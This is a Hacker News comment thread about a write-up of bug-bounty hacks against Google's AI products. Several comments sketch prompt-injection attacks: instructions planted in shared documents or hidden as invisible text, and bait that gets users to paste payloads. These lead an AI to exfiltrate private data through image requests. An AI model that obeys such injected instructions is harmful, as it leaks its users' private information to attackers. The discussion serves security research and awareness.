[HN Gopher] We hacked Google A.I.
___________________________________________________________________
We hacked Google A.I.
Author : EvgeniyZh
Score : 126 points
Date : 2024-03-06 20:00 UTC (3 hours ago)
(HTM) web link (www.landh.tech)
(TXT) w3m dump (www.landh.tech)
| px43 wrote:
| Loving that CSP bypass :-D
| o11c wrote:
| So now it's not just Artificial Stupidity, but Artificial
| Insecurity.
| sonicanatidae wrote:
| It was never secure and anyone that said it was, was lying or
| mistaken.
| seafoamteal wrote:
| This was a really interesting and also fun read. Btw, I am
| absolutely _loving_ the design of this website.
| doakes wrote:
| So is the idea (for the last/$20k one) that you would convince
| someone to paste your maliciously crafted prompt to steal their
| data?
|
| The other post[0] of the same exploit is really interesting b/c
| it reads instructions from a document. So if someone had
| something like "find X in my documents" and you shared the
| malicious document with them, it could trigger those
| instructions.
|
| [0] https://embracethered.com/blog/posts/2023/google-bard-
| data-e...
| vizzah wrote:
| yeah, sounds like a "weird" vulnerability assuming it comes
| from a malicious _text_ payload someone must deliberately
| insert into the own chat.
|
| Hard to fathom $20k prize for that, to us old-schoolers, used
| to at least expect exploit delivery from an innocently-looking
| link.
| doakes wrote:
| That was my thought. Since you could also convince them to
| paste "javascript:..." into their URL bar and that's not an
| issue to Google.
| kccqzy wrote:
| It's not weird in the sense that people are known to trick
| other people into opening the browser's JS console and
| pasting various things they don't understand. Things like
| "open Facebook then open the console and paste this to see
| whether your crush is stalking your profile" and people would
| actually do that. Of course the pasted script actually
| exfiltrates to the attacker a bunch of your private
| information.
| moyix wrote:
| Worth noting that you can use "invisible text" to give
| instructions to LLMs without it showing up in the chat box.
| So all you have to do is get someone to copy/paste one of
| those messages into their chat, and there are lots of ways
| you might be able to do this ("omg I figured out a cool new
| jailbreak that makes the model do anything you want!"). See
| here for more details:
|
| https://news.ycombinator.com/item?id=39004822
|
| https://twitter.com/goodside/status/1746685366952735034
| kangabru wrote:
| With all the hype around AI I'm sure people are trying out
| all sorts of products that could have vulnerabilities like
| this. For example, imagine a recruiter hooks up an AI product
| to auto-read their LinkedIn messages and evaluate candidates.
| An attacker would just have to contact them, get the AI to
| read something of theirs, and this prompt attack could expose
| private information about the recruiter and/or company. The
| attacker would just need the recruiter to view the image (or
| better yet, have the service prefetch the image) to expose
| the data.
| lordswork wrote:
| You could probably obfuscate the text payload and make it
| seem like a cool trick you'd want to try out yourself, like
| "Check out this prompt that generates these cool images with
| Gemini!" (cool images attached).
| guessbest wrote:
| Its seems like a combination of 90's seo spam pages combined
| with running unsigned/unchecked executables. I think we're
| going to have certifications and positions for AI Tools
| Security Officers in the near future if we don't already.
| epolanski wrote:
| This blog post gave me a great deal of self confidence.
|
| While I have no doubts how good the author and his friends are,
| all of their ideas were quite intuitive and simple to understand.
|
| The kind of "I could've come with the same idea" type.
| Realistically I would've not for many reasons but it is still
| stuff I can grasp and even gives me ideas while reading.
|
| Which is different from the general hacker idea I have of someone
| in a basement exploiting extremely far fetched and hard to grasp
| for me memory corruptions in some cache dumping some random bytes
| like the very complex attacks like Spectre I've read about.
|
| It also makes me think that if most of the applications I have
| worked on haven't been attacked and easily exploited is because
| honestly nobody bothered.
| drakythe wrote:
| The general hacker idea you have is... not reality.
| dylan604 wrote:
| > It also makes me think that if most of the applications I
| have worked on haven't been attacked and easily exploited is
| because honestly nobody bothered.
|
| This is my view of the things I create as well, and the fact
| they are not released to the public, and are not generally
| public facing. Building internal tools does have a bit of
| freedom. However, I do things to the best of my knowledge "best
| practice" and don't intentionally do stupid things just
| because. But it is rather reassuring knowing that it's not that
| exposed to show how small "best of my knowledge" really is
| akira2501 wrote:
| The best lock pickers spend a lot of time making their own
| locks.
| Lockal wrote:
| I already prepared to make a rant with "yet another cool-hacker
| invented prompt injection or discovered how LLM works", but was
| pleasantly surprised that it was not the case
| kccqzy wrote:
| > The awesome part is that we could ask them any question about
| the applications, how they worked and the security engineers
| could quickly check the source code to indicate if we should dig
| into our ideas or if our assumptions are a dead end.
|
| Wow. So this is basically around the same access as an internal
| red team. Simply amazing!
| asynchronous wrote:
| Unrelated to the article but the website design itself is top
| notch.
| Labo333 wrote:
| Great article! (shameless plug) As an alternative to "Burp
| Extension Copy As Python-Requests", I coded this CLI tool that
| converts HAR to Python Requests code:
| https://github.com/louisabraham/har2requests
___________________________________________________________________
(page generated 2024-03-06 23:00 UTC)